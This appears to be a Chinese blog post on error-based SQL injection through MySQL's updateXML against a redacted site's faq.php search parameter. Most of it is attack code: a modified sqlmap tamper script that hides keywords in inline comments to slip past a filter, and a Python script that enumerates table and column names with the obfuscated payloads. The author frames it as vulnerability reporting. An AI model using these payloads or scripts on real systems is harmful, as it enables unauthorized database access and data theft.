• updateXML 注入 python 脚本


    用SLQMAP来跑updateXML注入发现拦截关键字,然后内联注入能绕,最后修改halfversionedmorekeywords.py脚本,结果SQLMAP还是跑不出来。>_<

    halfversionedmorekeywords.py脚本修改后如下:

    #!/usr/bin/env python
    
    
    import os
    import re
    
    from lib.core.common import singleTimeWarnMessage
    from lib.core.data import kb
    from lib.core.enums import DBMS
    from lib.core.enums import PRIORITY
    from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
    
    __priority__ = PRIORITY.HIGHER
    
    def dependencies():
        singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
    
    def tamper(payload, **kwargs):
    
        def process(match):
            word = match.group('word')
            if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
                return match.group().replace(word, "/*!12345 %s*/" % word)
            else:
                return match.group()
    
        retVal = payload
    
        if payload:
            retVal = re.sub(r"(?<=W)(?P<word>[A-Za-z_]+)(?=W|)", lambda match: process(match), retVal)
            retVal = retVal.replace(" /*!0", "/*!0")
    
        return retVal

    自己写个脚本得了,于是有了以下代码,成功跑出表名和字段。

    #coding=utf-8
    
    
    import requests
    import re, binascii, warnings, time
    warnings.filterwarnings("ignore")
    
    
    table_name_list = []
    
    for k in range(1,112):
        #遍历表名
        url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&" 
              "searchopt=content&searchkey=1' /*!and*//*!updateXML*/" 
              "(1,concat(0x7e, (select /*!table_name*/ /*!from*/ information_schema.tables limit " + str(k) + ",1),0x7e),3)-- -" 
              "&x=4&y=23"
    
        req = requests.get(url)
    
        a = re.findall(r"'~(.*)~'", req.text)
    
        if a:table_name_list.append(a[0])
        else:pass
    
    print table_name_list
    
    for i in  table_name_list:
        print u"表名为:",i #输出表名
        #遍历字长度
        url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" 
              "' /*!and*//*!updateXML*/(1,concat(0x7e, " 
              "(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!count(column_name)*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " 
              "where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ ),0x7e),3)-- -&x=4&y=23"
    
        req = requests.get(url)
    
        b = re.findall(r"'~(.*)~'",req.text)
    
        if b:
            m = int(b[0].strip("~"))+1
            print u"行数为:",m #输出行数
            for n in range(1,m):
                #遍历字段名
                url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" 
                      "' /*!and*//*!updateXML*/(1,concat(0x7e, " 
                      "(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!column_name*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " 
                      "where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ limit "+str(n)+",1),0x7e),3)-- -&x=4&y=23"
    
                req = requests.get(url)
    
                c = re.findall(r"'~(.*)~'", req.text)
                if c:print u"字段:",str(c).strip("[u'~").strip("~']")
                else:pass
        else:pass

    收工,提漏洞。拜拜。

  • 相关阅读:
    【NXOpen.UF扩展】修改表达式
    NX二次开发 克隆
    C++手动加载CLR运行托管程序(CLR Hosting)
    C++/CLR 使用(VS2012,VS2013,VS2015)编写
    解决VS2015安装后stdio.h ucrtd.lib等文件无法识别问题,即include+lib环境变量配置
    NX 图标
    【错误分析】NX error status: 32
    NX CAM 读取加工参数
    CAM 模板样式表
    锁定NX原生界面 & 锁定界面更新
  • 原文地址:https://www.cnblogs.com/MiWhite/p/7062207.html
Copyright © 2020-2023  润新知